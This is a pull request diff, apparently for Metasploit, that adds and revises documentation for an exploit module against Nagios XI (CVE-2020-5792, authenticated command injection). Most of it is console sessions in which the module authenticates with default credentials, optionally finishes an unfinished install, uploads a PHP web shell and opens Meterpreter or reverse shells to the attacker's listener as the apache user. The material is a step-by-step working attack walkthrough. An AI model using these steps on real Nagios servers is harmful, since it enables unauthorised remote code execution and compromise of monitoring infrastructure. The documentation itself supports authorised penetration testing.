### PR TITLE
Add Nagios XI snmptrap RCE and docs (CVE-2020-5792)

### DIFF
--- a/documentation/modules/exploit/linux/http/nagios_xi_snmptrap_authenticated_rce.md
+++ b/documentation/modules/exploit/linux/http/nagios_xi_snmptrap_authenticated_rce.md
@@ -68,8 +68,8 @@ Module options (exploit/linux/http/nagios_xi_snmptrap_authenticated_rce):
 
    Name            Current Setting  Required  Description
    ----            ---------------  --------  -----------
-   FINISH_INSTALL  false            no        If the Nagios XI installation has not been completed, try to do so
-                                              . This includes signing the license agreement.
+   FINISH_INSTALL  false            no        If the Nagios XI installation has not been completed, try to do so.
+                                              This includes signing the license agreement.
    PASSWORD        nagiosadmin      yes       Password to authenticate with
    Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
    RHOSTS          192.168.1.16     yes       The target host(s), range CIDR identifier, or hosts file with synt
@@ -187,4 +187,181 @@ msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > run
 
 id
 uid=48(apache) gid=48(apache) groups=48(apache),1000(nagios),1001(nagcmd)
+```
+
+### Nagios XI 5.6.5 running on CentOS 7 - Linux Target
+```
+msf6 > use exploit/linux/http/nagios_xi_snmptrap_authenticated_rce
+[*] Using configured payload linux/x86/meterpreter/reverse_tcp
+msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > set PASSWORD nagiosadmin
+PASSWORD => nagiosadmin
+msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > set FINISH_INSTALL true
+FINISH_INSTALL => true
+msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > set LHOST 172.21.163.243
+LHOST => 172.21.163.243
+msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > set RHOSTS 172.21.168.44
+RHOSTS => 172.21.168.44
+msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > check
+
+[*] Attempting to authenticate to Nagios XI...
+[!] The target seems to be a Nagios XI application that has not been fully installed yet.
+[*] Attempting to finish the Nagios XI installation on the target using the provided password. The username will be `nagiosadmin`.
+[*] Attempting to authenticate to Nagios XI...
+[!] No response received from the server. This can happen after installing Nagios XI or signing the license agreement
+[*] The module will wait for 5 seconds and retry.
+[*] Attempting to authenticate to Nagios XI...
+[!] The Nagios XI license agreement has not yet been signed on the target.
+[*] Attempting to sign the Nagios XI license agreement...
+[*] Attempting to authenticate to Nagios XI...
+[+] Successfully authenticated to Nagios XI
+[*] Target is Nagios XI with version 5.6.5
+[*] 172.21.168.44:80 - The target appears to be vulnerable.
+msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > exploit
+
+[*] Started reverse TCP handler on 172.21.163.243:4444
+[*] Executing automatic check (disable AutoCheck to override)
+[*] Attempting to authenticate to Nagios XI...
+[+] Successfully authenticated to Nagios XI
+[*] Target is Nagios XI with version 5.6.5
+[+] The target appears to be vulnerable.
+[*] Uploading a simple PHP shell to /usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/KBRRRebd.php
+[*] Attempting to execute the initial payload via `/nagiosxi/includes/components/autodiscovery/jobs/KBRRRebd.php?z=<cmd>`
+[*] Sending stage (980808 bytes) to 172.21.168.44
+[*] Command Stager progress - 100.00% done (773/773 bytes)
+[+] Deleted /usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/KBRRRebd.php
+[*] Meterpreter session 1 opened (172.21.163.243:4444 -> 172.21.168.44:35554) at 2021-04-20 13:52:24 -0500
+
+meterpreter > getuid
+Server username: apache @ localhost.localdomain (uid=48, gid=48, euid=48, egid=48)
+meterpreter > pwd
+/usr/local/nagiosxi/html/includes/components/autodiscovery/jobs
+meterpreter > exit
+[*] Shutting down Meterpreter...
+
+[*] 172.21.168.44 - Meterpreter session 1 closed.  Reason: User exit
+msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > show options
+
+Module options (exploit/linux/http/nagios_xi_snmptrap_authenticated_rce):
+
+   Name            Current Setting  Required  Description
+   ----            ---------------  --------  -----------
+   FINISH_INSTALL  true             no        If the Nagios XI installation has not been completed, try to do so. This includes s
+                                              igning the license agreement.
+   PASSWORD        nagiosadmin      yes       Password to authenticate with
+   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS          172.21.168.44    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT           80               yes       The target port (TCP)
+   SRVHOST         0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the lo
+                                              cal machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT         8080             yes       The local port to listen on.
+   SSL             false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI       /nagiosxi/       yes       The base path to the Nagios XI application
+   URIPATH                          no        The URI to use for this exploit (default is random)
+   USERNAME        nagiosadmin      yes       Username to authenticate with
+   VHOST                            no        HTTP server virtual host
+
+
+Payload options (linux/x86/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  172.21.163.243   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Linux (x86/x64)
+
+
+msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) >
+```
+
+### Nagios XI 5.6.5 running on CentOS 7 - CMD Target
+```
+msf6 > use exploit/linux/http/nagios_xi_snmptrap_authenticated_rce
+[*] Using configured payload linux/x86/meterpreter/reverse_tcp
+msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > set PASSWORD nagiosadmin
+PASSWORD => nagiosadmin
+msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > set FINISH_INSTALL true
+FINISH_INSTALL => true
+msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > set LHOST 172.21.163.243
+LHOST => 172.21.163.243
+msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > set RHOSTS 172.21.168.44
+RHOSTS => 172.21.168.44
+msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > check
+
+[*] Attempting to authenticate to Nagios XI...
+[!] The target seems to be a Nagios XI application that has not been fully installed yet.
+[*] Attempting to finish the Nagios XI installation on the target using the provided password. The username will be `nagiosadmin`.
+[*] Attempting to authenticate to Nagios XI...
+[!] No response received from the server. This can happen after installing Nagios XI or signing the license agreement
+[*] The module will wait for 5 seconds and retry.
+[*] Attempting to authenticate to Nagios XI...
+[!] The Nagios XI license agreement has not yet been signed on the target.
+[*] Attempting to sign the Nagios XI license agreement...
+[*] Attempting to authenticate to Nagios XI...
+[+] Successfully authenticated to Nagios XI
+[*] Target is Nagios XI with version 5.6.5
+[*] 172.21.168.44:80 - The target appears to be vulnerable.
+msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > set TARGET 1
+TARGET => 1
+msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > show options
+
+Module options (exploit/linux/http/nagios_xi_snmptrap_authenticated_rce):
+
+   Name            Current Setting  Required  Description
+   ----            ---------------  --------  -----------
+   FINISH_INSTALL  true             no        If the Nagios XI installation has not been completed, try to do so. This includes s
+                                              igning the license agreement.
+   PASSWORD        nagiosadmin      yes       Password to authenticate with
+   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS          172.21.168.44    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT           80               yes       The target port (TCP)
+   SRVHOST         0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the lo
+                                              cal machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT         8080             yes       The local port to listen on.
+   SSL             false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI       /nagiosxi/       yes       The base path to the Nagios XI application
+   URIPATH                          no        The URI to use for this exploit (default is random)
+   USERNAME        nagiosadmin      yes       Username to authenticate with
+   VHOST                            no        HTTP server virtual host
+
+
+Payload options (cmd/unix/reverse_awk):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  172.21.163.243   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   CMD
+
+
+msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > exploit
+
+[*] Started reverse TCP handler on 172.21.163.243:4444
+[*] Executing automatic check (disable AutoCheck to override)
+[*] Attempting to authenticate to Nagios XI...
+[+] Successfully authenticated to Nagios XI
+[*] Target is Nagios XI with version 5.6.5
+[+] The target appears to be vulnerable.
+[*] Uploading a simple PHP shell to /usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/lZrKJcDOtsT.php
+[*] Attempting to execute the payload via `/nagiosxi/includes/components/autodiscovery/jobs/lZrKJcDOtsT.php?v=<cmd>`
+[+] Deleted /usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/lZrKJcDOtsT.php
+[*] Command shell session 2 opened (172.21.163.243:4444 -> 172.21.168.44:40205) at 2021-04-20 13:57:48 -0500
+
+id
+uid=48(apache) gid=48(apache) groups=48(apache),1000(nagios),1001(nagcmd) context=system_u:system_r:httpd_t:s0
+whoami
+apache
 ```

--- a/documentation/modules/exploit/linux/http/nagios_xi_snmptrap_authenticated_rce.md
+++ b/documentation/modules/exploit/linux/http/nagios_xi_snmptrap_authenticated_rce.md
@@ -1,0 +1,123 @@
+## Vulnerable Application
+This module exploits an OS command injection vulnerability (CVE-2020-5792) in `includes/components/nxti/index.php`
+that enables an authenticated user with admin privileges to achieve remote code execution as the `apache` user.
+
+The module's `check` method takes advantage of the `Msf::Exploit::Remote::HTTP::NagiosXi` mixin in order to authenticate to the target and
+obtain the Nagios XI version number, which is then used to check if the target is version 5.7.3 and therefore vulnerable.
+
+Next, the module uploads a simple PHP shell to `includes/components/nxti/index.php` and then executes the payload
+via an HTTP GET request to `includes/components/autodiscovery/jobs/<php_shell>?<php_param>=<cmd>`
+
+The module supports `linux/x64` and `linux/x86` payloads (target 0) as well as `cmd/unix` payloads (target 1),
+However, the only reliable `cmd/unix` payloads against a typical Nagios XI host (CentOS 7 minimal) seem to be
+`cmd/unix/reverse_awk`, `cmd/unix/reverse_perl_ssl` and `cmd/unix/reverse_openssl`.
+
+Valid credentials for a Nagios XI admin user are required.
+This module has been successfully tested against Nagios XI 5.7.3 running on CentOS 7.
+
+Vulnerable software for testing is vavailable [here](https://assets.nagios.com/downloads/nagiosxi/versions.php).
+Detailed installation instructions are available
+[here](https://assets.nagios.com/downloads/nagiosxi/docs/Installing-Nagios-XI-Manually-on-Linux.pdf)
+and an official video tutorial is available [here](https://www.youtube.com/watch?v=fBWA6t6dJ4I).
+
+## Verification Steps
+1. Start msfconsole
+2. Do: `use exploit/linux/http/nagios_xi_snmptrap_authenticated_rce`
+3. Do: `set RHOSTS [IP]`
+4. Do: `set USERNAME [username for the Nagios XI account]`
+5. Do: `set PASSWORD [password for the Nagios XI account]`
+6. Do: `set target [target]`
+7. Do: `set payload [payload]`
+8. Do: `set LHOST [IP]`
+9. Do: `exploit`
+
+## Options
+### PASSWORD
+The password for the Nagios XI account to authenticate with.
+### TARGETURI
+The base path to Nagios XI. The default value is `/nagiosxi/`.
+### USERNAME
+The username for the Nagios XI account to authenticate with. The default value is `nagiosadmin`.
+
+## Targets
+```
+Id  Name
+--  ----
+0   Linux
+1   CMD
+```
+
+## Scenarios
+### Nagios XI 5.7.3 running on CentOS 7 - Linux target
+```
+msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > show options 
+
+Module options (exploit/linux/http/nagios_xi_snmptrap_authenticated_rce):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   PASSWORD   nagiosadmin      yes       Password to authenticate with
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     192.168.1.14     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT      80               yes       The target port (TCP)
+   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT    8080             yes       The local port to listen on.
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /nagiosxi/       yes       The base path to the NagiosXi application
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   USERNAME   nagiosadmin      yes       Username to authenticate with
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (linux/x86/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.1.12     yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Linux
+
+
+msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > run
+
+[*] Started reverse TCP handler on 192.168.1.12:4444 
+[*] Executing automatic check (disable AutoCheck to override)
+[+] Successfully authenticated to Nagios XI
+[*] Target is Nagios XI with version 5.7.3
+[+] The target appears to be vulnerable.
+[*] Uploading a simple PHP shell to /usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/FstbNexJNZ.php
+[*] Attempting to execute the initial payload via `/nagiosxi/includes/components/autodiscovery/jobs/FstbNexJNZ.php?T=<cmd>`
+[*] Sending stage (976712 bytes) to 192.168.1.14
+[*] Meterpreter session 1 opened (192.168.1.12:4444 -> 192.168.1.14:42758) at 2021-02-01 11:19:46 -0500
+[*] Command Stager progress - 100.00% done (773/773 bytes)
+[!] This exploit may require manual cleanup of '/usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/FstbNexJNZ.php' on the target
+
+meterpreter > 
+[+] Deleted /usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/FstbNexJNZ.php
+getuid
+Server username: apache @ localhost.localdomain (uid=48, gid=48, euid=48, egid=48)
+```
+### Nagios XI 5.7.3 running on CentOS 7 - CMD target
+```
+msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > run
+
+[*] Started reverse TCP handler on 192.168.1.12:4444 
+[*] Executing automatic check (disable AutoCheck to override)
+[+] Successfully authenticated to Nagios XI
+[*] Target is Nagios XI with version 5.7.3
+[+] The target appears to be vulnerable.
+[*] Uploading a simple PHP shell to /usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/wMwKGRHf.php
+[*] Attempting to execute the payload via `/nagiosxi/includes/components/autodiscovery/jobs/wMwKGRHf.php?W=<cmd>`
+[*] Command shell session 2 opened (192.168.1.12:4444 -> 192.168.1.14:41607) at 2021-02-01 11:21:12 -0500
+[+] Deleted /usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/wMwKGRHf.php
+
+id
+uid=48(apache) gid=48(apache) groups=48(apache),1000(nagios),1001(nagcmd)
+```

--- a/documentation/modules/exploit/linux/http/nagios_xi_snmptrap_authenticated_rce.md
+++ b/documentation/modules/exploit/linux/http/nagios_xi_snmptrap_authenticated_rce.md
@@ -5,8 +5,9 @@ that enables an authenticated user with admin privileges to achieve remote code 
 The module's `check` method takes advantage of the `Msf::Exploit::Remote::HTTP::NagiosXi` mixin in order to authenticate to the target and
 obtain the Nagios XI version number, which is then used to check if the target is version 5.5.0-5.7.3 and therefore vulnerable.
 
-Next, the module uploads a simple PHP shell to `includes/components/nxti/index.php` and then executes the payload
-via an HTTP GET request to `includes/components/autodiscovery/jobs/<php_shell>?<php_param>=<cmd>`
+Next, the module uploads a simple PHP shell via `includes/components/nxti/index.php` to `includes/components/autodiscovery/jobs/<php_shell>`
+and then executes the payload via a HTTP GET request to `includes/components/autodiscovery/jobs/<php_shell>?<php_param>=<cmd>`. This will
+will result in the command specified by the attacker, aka `<cmd>`, being executed as the `apache` user.
 
 The module supports `linux/x64` and `linux/x86` payloads (target 0) as well as `cmd/unix` payloads (target 1),
 However, the only reliable `cmd/unix` payloads against a typical Nagios XI host (CentOS 7 minimal) seem to be
@@ -15,7 +16,7 @@ However, the only reliable `cmd/unix` payloads against a typical Nagios XI host 
 Valid credentials for a Nagios XI admin user are required.
 This module has been successfully tested against Nagios XI 5.7.3 running on CentOS 7.
 
-Vulnerable software for testing is vavailable [here](https://assets.nagios.com/downloads/nagiosxi/versions.php).
+Vulnerable software for testing is available [here](https://assets.nagios.com/downloads/nagiosxi/versions.php).
 Detailed installation instructions are available
 [here](https://assets.nagios.com/downloads/nagiosxi/docs/Installing-Nagios-XI-Manually-on-Linux.pdf)
 and an official video tutorial is available [here](https://www.youtube.com/watch?v=fBWA6t6dJ4I).
@@ -24,8 +25,8 @@ and an official video tutorial is available [here](https://www.youtube.com/watch
 1. Start msfconsole
 2. Do: `use exploit/linux/http/nagios_xi_snmptrap_authenticated_rce`
 3. Do: `set RHOSTS [IP]`
-4. Do: `set USERNAME [username for the Nagios XI account]`
-5. Do: `set PASSWORD [password for the Nagios XI account]`
+4. Do: `set USERNAME [username for the Nagios XI account with administrative privileges]`
+5. Do: `set PASSWORD [password for the Nagios XI account with administrative privileges]`
 6. Do: `set target [target]`
 7. Do: `set payload [payload]`
 8. Do: `set LHOST [IP]`
@@ -46,14 +47,14 @@ The username for the Nagios XI account to authenticate with. The default value i
 ```
 Id  Name
 --  ----
-0   Linux
+0   Linux (x86/x64)
 1   CMD
 ```
 
 ## Scenarios
 ### Nagios XI 5.7.3 running on CentOS 7 - Linux target
 ```
-msf6 > use exploit/linux/http/nagios_xi_snmptrap_authenticated_rce 
+msf6 > use exploit/linux/http/nagios_xi_snmptrap_authenticated_rce
 [*] Using configured payload linux/x86/meterpreter/reverse_tcp
 msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > set rhosts 192.168.1.16
 rhosts => 192.168.1.16
@@ -61,7 +62,7 @@ msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > set lhost 192.16
 lhost => 192.168.1.12
 msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > set password nagiosadmin
 password => nagiosadmin
-msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > show options 
+msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > show options
 
 Module options (exploit/linux/http/nagios_xi_snmptrap_authenticated_rce):
 
@@ -98,12 +99,12 @@ Exploit target:
 
    Id  Name
    --  ----
-   0   Linux
+   0   Linux (x86/x64)
 
 
 msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > run
 
-[*] Started reverse TCP handler on 192.168.1.12:4444 
+[*] Started reverse TCP handler on 192.168.1.12:4444
 [*] Executing automatic check (disable AutoCheck to override)
 [*] Attempting to authenticate to Nagios XI...
 [+] Successfully authenticated to Nagios XI
@@ -121,7 +122,7 @@ Server username: apache @ localhost.localdomain (uid=48, gid=48, euid=48, egid=4
 ```
 ### Nagios XI 5.7.3 running on CentOS 7 - CMD target
 ```
-msf6 > use exploit/linux/http/nagios_xi_snmptrap_authenticated_rce 
+msf6 > use exploit/linux/http/nagios_xi_snmptrap_authenticated_rce
 [*] Using configured payload linux/x86/meterpreter/reverse_tcp
 msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > set rhosts 192.168.1.16
 rhosts => 192.168.1.16
@@ -131,7 +132,7 @@ msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > set password nag
 password => nagiosadmin
 msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > set target 1
 target => 1
-msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > show options 
+msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > show options
 
 Module options (exploit/linux/http/nagios_xi_snmptrap_authenticated_rce):
 
@@ -173,7 +174,7 @@ Exploit target:
 
 msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > run
 
-[*] Started reverse TCP handler on 192.168.1.12:4444 
+[*] Started reverse TCP handler on 192.168.1.12:4444
 [*] Executing automatic check (disable AutoCheck to override)
 [*] Attempting to authenticate to Nagios XI...
 [+] Successfully authenticated to Nagios XI

--- a/documentation/modules/exploit/linux/http/nagios_xi_snmptrap_authenticated_rce.md
+++ b/documentation/modules/exploit/linux/http/nagios_xi_snmptrap_authenticated_rce.md
@@ -3,7 +3,7 @@ This module exploits an OS command injection vulnerability (CVE-2020-5792) in `i
 that enables an authenticated user with admin privileges to achieve remote code execution as the `apache` user.
 
 The module's `check` method takes advantage of the `Msf::Exploit::Remote::HTTP::NagiosXi` mixin in order to authenticate to the target and
-obtain the Nagios XI version number, which is then used to check if the target is version 5.7.3 and therefore vulnerable.
+obtain the Nagios XI version number, which is then used to check if the target is version 5.5.0-5.7.3 and therefore vulnerable.
 
 Next, the module uploads a simple PHP shell to `includes/components/nxti/index.php` and then executes the payload
 via an HTTP GET request to `includes/components/autodiscovery/jobs/<php_shell>?<php_param>=<cmd>`
@@ -32,6 +32,9 @@ and an official video tutorial is available [here](https://www.youtube.com/watch
 9. Do: `exploit`
 
 ## Options
+### FINISH_INSTALL
+If this is set to `true`, the module will try to finish installing Nagios XI on targets where the installation has not been completed.
+This includes signing the license agreement. The default value is `false`.
 ### PASSWORD
 The password for the Nagios XI account to authenticate with.
 ### TARGETURI
@@ -50,24 +53,37 @@ Id  Name
 ## Scenarios
 ### Nagios XI 5.7.3 running on CentOS 7 - Linux target
 ```
+msf6 > use exploit/linux/http/nagios_xi_snmptrap_authenticated_rce 
+[*] Using configured payload linux/x86/meterpreter/reverse_tcp
+msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > set rhosts 192.168.1.16
+rhosts => 192.168.1.16
+msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > set lhost 192.168.1.12
+lhost => 192.168.1.12
+msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > set password nagiosadmin
+password => nagiosadmin
 msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > show options 
 
 Module options (exploit/linux/http/nagios_xi_snmptrap_authenticated_rce):
 
-   Name       Current Setting  Required  Description
-   ----       ---------------  --------  -----------
-   PASSWORD   nagiosadmin      yes       Password to authenticate with
-   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
-   RHOSTS     192.168.1.14     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
-   RPORT      80               yes       The target port (TCP)
-   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
-   SRVPORT    8080             yes       The local port to listen on.
-   SSL        false            no        Negotiate SSL/TLS for outgoing connections
-   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
-   TARGETURI  /nagiosxi/       yes       The base path to the NagiosXi application
-   URIPATH                     no        The URI to use for this exploit (default is random)
-   USERNAME   nagiosadmin      yes       Username to authenticate with
-   VHOST                       no        HTTP server virtual host
+   Name            Current Setting  Required  Description
+   ----            ---------------  --------  -----------
+   FINISH_INSTALL  false            no        If the Nagios XI installation has not been completed, try to do so
+                                              . This includes signing the license agreement.
+   PASSWORD        nagiosadmin      yes       Password to authenticate with
+   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS          192.168.1.16     yes       The target host(s), range CIDR identifier, or hosts file with synt
+                                              ax 'file:<path>'
+   RPORT           80               yes       The target port (TCP)
+   SRVHOST         0.0.0.0          yes       The local host or network interface to listen on. This must be an
+                                              address on the local machine or 0.0.0.0 to listen on all addresses
+                                              .
+   SRVPORT         8080             yes       The local port to listen on.
+   SSL             false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI       /nagiosxi/       yes       The base path to the Nagios XI application
+   URIPATH                          no        The URI to use for this exploit (default is random)
+   USERNAME        nagiosadmin      yes       Username to authenticate with
+   VHOST                            no        HTTP server virtual host
 
 
 Payload options (linux/x86/meterpreter/reverse_tcp):
@@ -89,34 +105,84 @@ msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > run
 
 [*] Started reverse TCP handler on 192.168.1.12:4444 
 [*] Executing automatic check (disable AutoCheck to override)
+[*] Attempting to authenticate to Nagios XI...
 [+] Successfully authenticated to Nagios XI
 [*] Target is Nagios XI with version 5.7.3
 [+] The target appears to be vulnerable.
-[*] Uploading a simple PHP shell to /usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/FstbNexJNZ.php
-[*] Attempting to execute the initial payload via `/nagiosxi/includes/components/autodiscovery/jobs/FstbNexJNZ.php?T=<cmd>`
-[*] Sending stage (976712 bytes) to 192.168.1.14
-[*] Meterpreter session 1 opened (192.168.1.12:4444 -> 192.168.1.14:42758) at 2021-02-01 11:19:46 -0500
+[*] Uploading a simple PHP shell to /usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/yRzLEtzVyAm.php
+[*] Attempting to execute the initial payload via `/nagiosxi/includes/components/autodiscovery/jobs/yRzLEtzVyAm.php?i=<cmd>`
+[*] Sending stage (980808 bytes) to 192.168.1.16
 [*] Command Stager progress - 100.00% done (773/773 bytes)
-[!] This exploit may require manual cleanup of '/usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/FstbNexJNZ.php' on the target
+[+] Deleted /usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/yRzLEtzVyAm.php
+[*] Meterpreter session 1 opened (192.168.1.12:4444 -> 192.168.1.16:54824) at 2021-04-01 12:36:52 -0400
 
-meterpreter > 
-[+] Deleted /usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/FstbNexJNZ.php
-getuid
+meterpreter > getuid
 Server username: apache @ localhost.localdomain (uid=48, gid=48, euid=48, egid=48)
 ```
 ### Nagios XI 5.7.3 running on CentOS 7 - CMD target
 ```
+msf6 > use exploit/linux/http/nagios_xi_snmptrap_authenticated_rce 
+[*] Using configured payload linux/x86/meterpreter/reverse_tcp
+msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > set rhosts 192.168.1.16
+rhosts => 192.168.1.16
+msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > set lhost 192.168.1.12
+lhost => 192.168.1.12
+msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > set password nagiosadmin
+password => nagiosadmin
+msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > set target 1
+target => 1
+msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > show options 
+
+Module options (exploit/linux/http/nagios_xi_snmptrap_authenticated_rce):
+
+   Name            Current Setting  Required  Description
+   ----            ---------------  --------  -----------
+   FINISH_INSTALL  false            no        If the Nagios XI installation has not been completed, try to do so
+                                              . This includes signing the license agreement.
+   PASSWORD        nagiosadmin      yes       Password to authenticate with
+   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS          192.168.1.16     yes       The target host(s), range CIDR identifier, or hosts file with synt
+                                              ax 'file:<path>'
+   RPORT           80               yes       The target port (TCP)
+   SRVHOST         0.0.0.0          yes       The local host or network interface to listen on. This must be an
+                                              address on the local machine or 0.0.0.0 to listen on all addresses
+                                              .
+   SRVPORT         8080             yes       The local port to listen on.
+   SSL             false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI       /nagiosxi/       yes       The base path to the Nagios XI application
+   URIPATH                          no        The URI to use for this exploit (default is random)
+   USERNAME        nagiosadmin      yes       Username to authenticate with
+   VHOST                            no        HTTP server virtual host
+
+
+Payload options (cmd/unix/reverse_awk):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.1.12     yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   CMD
+
+
 msf6 exploit(linux/http/nagios_xi_snmptrap_authenticated_rce) > run
 
 [*] Started reverse TCP handler on 192.168.1.12:4444 
 [*] Executing automatic check (disable AutoCheck to override)
+[*] Attempting to authenticate to Nagios XI...
 [+] Successfully authenticated to Nagios XI
 [*] Target is Nagios XI with version 5.7.3
 [+] The target appears to be vulnerable.
-[*] Uploading a simple PHP shell to /usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/wMwKGRHf.php
-[*] Attempting to execute the payload via `/nagiosxi/includes/components/autodiscovery/jobs/wMwKGRHf.php?W=<cmd>`
-[*] Command shell session 2 opened (192.168.1.12:4444 -> 192.168.1.14:41607) at 2021-02-01 11:21:12 -0500
-[+] Deleted /usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/wMwKGRHf.php
+[*] Uploading a simple PHP shell to /usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/WwsImAkDSM.php
+[*] Attempting to execute the payload via `/nagiosxi/includes/components/autodiscovery/jobs/WwsImAkDSM.php?h=<cmd>`
+[+] Deleted /usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/WwsImAkDSM.php
+[*] Command shell session 2 opened (192.168.1.12:4444 -> 192.168.1.16:43831) at 2021-04-01 12:37:29 -0400
 
 id
 uid=48(apache) gid=48(apache) groups=48(apache),1000(nagios),1001(nagcmd)

--- a/modules/exploits/linux/http/nagios_xi_snmptrap_authenticated_rce.rb
+++ b/modules/exploits/linux/http/nagios_xi_snmptrap_authenticated_rce.rb
@@ -19,11 +19,12 @@ class MetasploitModule < Msf::Exploit::Remote
         'Name' => 'Nagios XI 5.5.0-5.7.3 - Snmptrap Authenticated Remote Code Exection',
         'Description' => %q{
           This module exploits an OS command injection vulnerability in
-          `includes/components/nxti/index.php` that enables an authenticated user
+          includes/components/nxti/index.php that enables an authenticated user
           with admin privileges to achieve remote code execution as the `apache`
